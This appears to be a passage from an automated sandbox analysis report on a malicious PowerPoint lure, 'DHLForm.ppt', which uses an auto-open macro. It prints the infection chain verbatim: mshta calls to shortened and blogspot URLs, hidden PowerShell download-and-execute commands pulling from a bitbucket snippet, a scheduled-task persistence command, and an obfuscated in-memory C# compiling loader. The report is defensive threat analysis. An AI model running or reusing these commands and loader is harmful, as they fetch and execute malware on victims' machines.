Source: C:\Windows\SysWOW64\mshta.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\mshta.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\mshta.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\mshta.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 22_2_00007FFAEB5B671C 22_2_00007FFAEB5B671C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 22_2_00007FFAEB685F95 22_2_00007FFAEB685F95
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 22_2_00007FFAEB686D6C 22_2_00007FFAEB686D6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 40_2_02FB4730 40_2_02FB4730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 40_2_02FB4790 40_2_02FB4790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 40_2_02FB4770 40_2_02FB4770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 40_2_02FBD661 40_2_02FBD661
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: DHLForm.ppt OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Searches for the Microsoft Outlook file path
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Yara signature match
Source: amsi32_5220.amsi.csv, type: OTHER Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: amsi64_6404.amsi.csv, type: OTHER Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000006.00000003.308761987.00000000067B7000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000006.00000003.278320998.0000000006859000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000006.00000003.334835674.00000000067BB000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000006.00000003.285035686.00000000067B7000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000006.00000003.271994315.00000000067DE000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000006.00000003.285799185.00000000067B7000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: Process Memory Space: mshta.exe PID: 6448, type: MEMORYSTR Matched rule: SUSP_GIF_Anomalies date = 2020-07-02, author = Florian Roth, description = Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type, score = https://en.wikipedia.org/wiki/GIF
Source: Process Memory Space: mshta.exe PID: 6448, type: MEMORYSTR Matched rule: webshell_in_image date = 2021/02/27, author = Arnim Rupp, description = Webshell in GIF, PNG or JPG, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = , hash = d4fde4e691db3e70a6320e78657480e563a9f87935af873a99db72d6a9a83c78
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: DHLForm.ppt OLE, VBA macro line: Sub auto_open()
PE file does not import any functions
Source: lmts0v03.dll.30.dr Static PE information: No import functions for PE file found
Source: a0uccovc.dll.31.dr Static PE information: No import functions for PE file found
Document contains embedded VBA macros
Source: DHLForm.ppt OLE indicator, VBA macros: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winPPT@50/134@38/9
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress) $gzipStream.CopyTo( $output ) $gzipStream.Close()$input.Close()[byte[]] $byteOutArray = $output.ToArray() return $byteOutArray }}function CodeDom([Byte[]] $BB, [String] $TP, [String] $MT) {$dictionary = new-object 'System.Collections.Generic.Dictionary[[string],[string]]'$hello = "Com<><><><><><><".Replace("<><><><><><><","pilerVersion")$v4 = "v4.0"$dictionary.Add($hello, $v4)$CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary)$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters$v1 = "Sys@@@".Replace("@@@","tem.dll")$CompilerParametres.ReferencedAssemblies.Add($v1)$CompilerParametres.ReferencedAssemblies.Add("System.!@!$^^%^%**&*&*$$%$%$".Replace("!@!$^^%^%**&*&*$$%$%$","Management.dll"))$CompilerParametres.ReferencedAssemblies.Add("System.Windows.Forms.dll")$CompilerParametres.ReferencedAssemblies.Add("mscorlib.dll")$CompilerParametres.ReferencedAssemblies.Add("Microsoft.VisualBasic.dll")$CompilerParametres.IncludeDebugInformation = $false$CompilerParametres.GenerateExecutable = $false$CompilerParametres.GenerateInMemory = $true$CompilerParametres.CompilerOptions += "/platform:X86 /unsafe /target:library"$BB = Decompress($BB)[System.CodeDom.Compiler.CompilerResults] $CompilerResults = $CsharpCompiler.CompileAssemblyFromSource($CompilerParametres, [System.Text.Encoding]::Default.GetString($BB))[Type] $T = $CompilerResults.CompiledAssembly.GetType($TP)[Byte[]] $Bytes = Decompress(@(31,139,8,0,0,0,0,0,4,0,204,189,7,152,28,197,177,56,62,59,187,59,105,195,93,239,238,205,198,187,89,229,209,237,41,156,68,184,147,64,58,162,201,201,128,201,18,57,24,88,224,4,6,4,135,176,113,68,8,129,19,62,11,140,101,27,219,56,27,108,225,140,35,78,216,56,201,182,140,206,56,231,108,63,63,219,32,253,43,116,79,216,93,33,222,179,223,239,251,235,211,205,118,87,117,247,244,116,87,87,87,87,87,87,31,123,198,102,45,169,105,90,10,254,118,239,214,180,71,52,254,55,161,237,253,223,6,248,203,123,31,205,107,15,219,143,207,122,36,113,204,227,179,78,190,228,210,201,230,85,215,180,47,190,230,220,43,154,231,159,123,229,149,237,117,205,243,46,108,94,115,237,149,205,75,175,108,30,122,252,243,155,87,180,47,184,112,113,46,231,204,149,101,156,112,152,166,29,147,72,106,63,127,106,226,92,85,238,83,154,158,200,36,44,77,59,13,106,102,48,108,215,117,16,110,170,20,19,28,214,185,222,154,22,254,106,143,38,9,174,17,122,226,165,154,214,79,255,195,223,224,135,254,189,21,202,125,1,125,12,228,75,246,248,200,251,147,90,246,57,180,69,215,63,168,159,21,137,90,16,63,34,18,95,188,238,194,235,215,97,189,95,32,191,235,180,176,222,145,34,214,46,190,102,242,154,243,49,146,148,117,196,15,61,35,94,209,9,248,191,248,154,11,47,111,67,194,172,172,51,149,117,78,87,186,131,59,171,249,212,117,156,6,235,166,107,105,237,128,205,186,118,201,207,249,117,213,160,245,159,251,191,33,221,79,104,154,51,12,191,41,252,125,96,18,138,112,54,0,44,53,105,98,8,251,108,210,194,16,126,204,164,141,33,72,153,26,214,180,226,82,93
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress) $gzipStream.CopyTo( $output ) $gzipStream.Close()$input.Close()[byte[]] $byteOutArray = $output.ToArray() return $byteOutArray }}function CodeDom([Byte[]] $BB, [String] $TP, [String] $MT) {$dictionary = new-object 'System.Collections.Generic.Dictionary[[string],[string]]'$hello = "Com<><><><><><><".Replace("<><><><><><><","pilerVersion")$v4 = "v4.0"$dictionary.Add($hello, $v4)$CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary)$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters$v1 = "Sys@@@".Replace("@@@","tem.dll")$CompilerParametres.ReferencedAssemblies.Add($v1)$CompilerParametres.ReferencedAssemblies.Add("System.!@!$^^%^%**&*&*$$%$%$".Replace("!@!$^^%^%**&*&*$$%$%$","Management.dll"))$CompilerParametres.ReferencedAssemblies.Add("System.Windows.Forms.dll")$CompilerParametres.ReferencedAssemblies.Add("mscorlib.dll")$CompilerParametres.ReferencedAssemblies.Add("Microsoft.VisualBasic.dll")$CompilerParametres.IncludeDebugInformation = $false$CompilerParametres.GenerateExecutable = $false$CompilerParametres.GenerateInMemory = $true$CompilerParametres.CompilerOptions += "/platform:X86 /unsafe /target:library"$BB = Decompress($BB)[System.CodeDom.Compiler.CompilerResults] $CompilerResults = $CsharpCompiler.CompileAssemblyFromSource($CompilerParametres, [System.Text.Encoding]::Default.GetString($BB))[Type] $T = $CompilerResults.CompiledAssembly.GetType($TP)[Byte[]] $Bytes = Decompress(@(31,139,8,0,0,0,0,0,4,0,204,189,7,152,28,197,177,56,62,59,187,59,105,195,93,239,238,205,198,187,89,229,209,237,41,156,68,184,147,64,58,162,201,201,128,201,18,57,24,88,224,4,6,4,135,176,113,68,8,129,19,62,11,140,101,27,219,56,27,108,225,140,35,78,216,56,201,182,140,206,56,231,108,63,63,219,32,253,43,116,79,216,93,33,222,179,223,239,251,235,211,205,118,87,117,247,244,116,87,87,87,87,87,87,31,123,198,102,45,169,105,90,10,254,118,239,214,180,71,52,254,55,161,237,253,223,6,248,203,123,31,205,107,15,219,143,207,122,36,113,204,227,179,78,190,228,210,201,230,85,215,180,47,190,230,220,43,154,231,159,123,229,149,237,117,205,243,46,108,94,115,237,149,205,75,175,108,30,122,252,243,155,87,180,47,184,112,113,46,231,204,149,101,156,112,152,166,29,147,72,106,63,127,106,226,92,85,238,83,154,158,200,36,44,77,59,13,106,102,48,108,215,117,16,110,170,20,19,28,214,185,222,154,22,254,106,143,38,9,174,17,122,226,165,154,214,79,255,195,223,224,135,254,189,21,202,125,1,125,12,228,75,246,248,200,251,147,90,246,57,180,69,215,63,168,159,21,137,90,16,63,34,18,95,188,238,194,235,215,97,189,95,32,191,235,180,176,222,145,34,214,46,190,102,242,154,243,49,146,148,117,196,15,61,35,94,209,9,248,191,248,154,11,47,111,67,194,172,172,51,149,117,78,87,186,131,59,171,249,212,117,156,6,235,166,107,105,237,128,205,186,118,201,207,249,117,213,160,245,159,251,191,33,221,79,104,154,51,12,191,41,252,125,96,18,138,112,54,0,44,53,105,98,8,251,108,210,194,16,126,204,164,141,33,72,153,26,214,180,226,82,93
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress) $gzipStream.CopyTo( $output ) $gzipStream.Close()$input.Close()[byte[]] $byteOutArray = $output.ToArray() return $byteOutArray }}function CodeDom([Byte[]] $BB, [String] $TP, [String] $MT) {$dictionary = new-object 'System.Collections.Generic.Dictionary[[string],[string]]'$hello = "Com<><><><><><><".Replace("<><><><><><><","pilerVersion")$v4 = "v4.0"$dictionary.Add($hello, $v4)$CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary)$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters$v1 = "Sys@@@".Replace("@@@","tem.dll")$CompilerParametres.ReferencedAssemblies.Add($v1)$CompilerParametres.ReferencedAssemblies.Add("System.!@!$^^%^%**&*&*$$%$%$".Replace("!@!$^^%^%**&*&*$$%$%$","Management.dll"))$CompilerParametres.ReferencedAssemblies.Add("System.Windows.Forms.dll")$CompilerParametres.ReferencedAssemblies.Add("mscorlib.dll")$CompilerParametres.ReferencedAssemblies.Add("Microsoft.VisualBasic.dll")$CompilerParametres.IncludeDebugInformation = $false$CompilerParametres.GenerateExecutable = $false$CompilerParametres.GenerateInMemory = $true$CompilerParametres.CompilerOptions += "/platform:X86 /unsafe /target:library"$BB = Decompress($BB)[System.CodeDom.Compiler.CompilerResults] $CompilerResults = $CsharpCompiler.CompileAssemblyFromSource($CompilerParametres, [System.Text.Encoding]::Default.GetString($BB))[Type] $T = $CompilerResults.CompiledAssembly.GetType($TP)[Byte[]] $Bytes = Decompress(@(31,139,8,0,0,0,0,0,4,0,204,189,7,152,28,197,177,56,62,59,187,59,105,195,93,239,238,205,198,187,89,229,209,237,41,156,68,184,147,64,58,162,201,201,128,201,18,57,24,88,224,4,6,4,135,176,113,68,8,129,19,62,11,140,101,27,219,56,27,108,225,140,35,78,216,56,201,182,140,206,56,231,108,63,63,219,32,253,43,116,79,216,93,33,222,179,223,239,251,235,211,205,118,87,117,247,244,116,87,87,87,87,87,87,31,123,198,102,45,169,105,90,10,254,118,239,214,180,71,52,254,55,161,237,253,223,6,248,203,123,31,205,107,15,219,143,207,122,36,113,204,227,179,78,190,228,210,201,230,85,215,180,47,190,230,220,43,154,231,159,123,229,149,237,117,205,243,46,108,94,115,237,149,205,75,175,108,30,122,252,243,155,87,180,47,184,112,113,46,231,204,149,101,156,112,152,166,29,147,72,106,63,127,106,226,92,85,238,83,154,158,200,36,44,77,59,13,106,102,48,108,215,117,16,110,170,20,19,28,214,185,222,154,22,254,106,143,38,9,174,17,122,226,165,154,214,79,255,195,223,224,135,254,189,21,202,125,1,125,12,228,75,246,248,200,251,147,90,246,57,180,69,215,63,168,159,21,137,90,16,63,34,18,95,188,238,194,235,215,97,189,95,32,191,235,180,176,222,145,34,214,46,190,102,242,154,243,49,146,148,117,196,15,61,35,94,209,9,248,191,248,154,11,47,111,67,194,172,172,51,149,117,78,87,186,131,59,171,249,212,117,156,6,235,166,107,105,237,128,205,186,118,201,207,249,117,213,160,245,159,251,191,33,221,79,104,154,51,12,191,41,252,125,96,18,138,112,54,0,44,53,105,98,8,251,108,210,194,16,126,204,164,141,33,72,153,26,214,180,226,82,93
Source: DHLForm.ppt Virustotal: Detection: 22%
Source: DHLForm.ppt ReversingLabs: Detection: 22%
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE' /AUTOMATION -Embedding
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Users\user\Desktop\DHLForm.ppt'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE' 'C:\Users\user\Desktop\DHLForm.ppt' /ou ''
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process created: C:\Windows\SysWOW64\mshta.exe MsHta https://bitly.com/yuiwqhdsavbdjagh
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''SECOTAKSA'' /F /tr ''\''MsHtA''\''http://1230948%1230948@randikhanaekminar.blogspot.com/p/ayoola.html\''
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\mshta.exe MsHtA 'http://1230948%1230948@randikhanaekminar.blogspot.com/p/ayoola.html'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\MsHTa.exe' http://1230948%1230948@backbones1234511a.blogspot.com/p/ayoolaback.html'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\MsHTa.exe' https://startthepartyup.blogspot.com/p/backbone16.html'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lmts0v03\lmts0v03.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a0uccovc\a0uccovc.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES63A1.tmp' 'c:\Users\user\AppData\Local\Temp\lmts0v03\CSCCA8985A0394D48BFA864CA75A5282D3A.TMP'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\MsHTa.exe' http://1230948%1230948@ghostbackbone123.blogspot.com/p/ghostbackup15.html'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES797A.tmp' 'c:\Users\user\AppData\Local\Temp\a0uccovc\CSCCC0B7B204924196A28CF024B8788083.TMP'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\MsHTa.exe' http://1230948%1230948@backbones1234511a.blogspot.com/p/ayoolaback.html'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\MsHTa.exe' https://startthepartyup.blogspot.com/p/backbone16.html'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\MsHTa.exe' http://1230948%1230948@ghostbackbone123.blogspot.com/p/ghostbackup15.html'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uz5edm2y\uz5edm2y.cmdline'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE' 'C:\Users\user\Desktop\DHLForm.ppt' /ou '' Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process created: C:\Windows\SysWOW64\mshta.exe MsHta https://bitly.com/yuiwqhdsavbdjagh Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB); Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''SECOTAKSA'' /F /tr ''\''MsHtA''\''http://1230948%1230948@randikhanaekminar.blogspot.com/p/ayoola.html\'' Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uz5edm2y\uz5edm2y.cmdline' Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lmts0v03\lmts0v03.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a0uccovc\a0uccovc.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES63A1.tmp' 'c:\Users\user\AppData\Local\Temp\lmts0v03\CSCCA8985A0394D48BFA864CA75A5282D3A.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES797A.tmp' 'c:\Users\user\AppData\Local\Temp\a0uccovc\CSCCC0B7B204924196A28CF024B8788083.TMP'
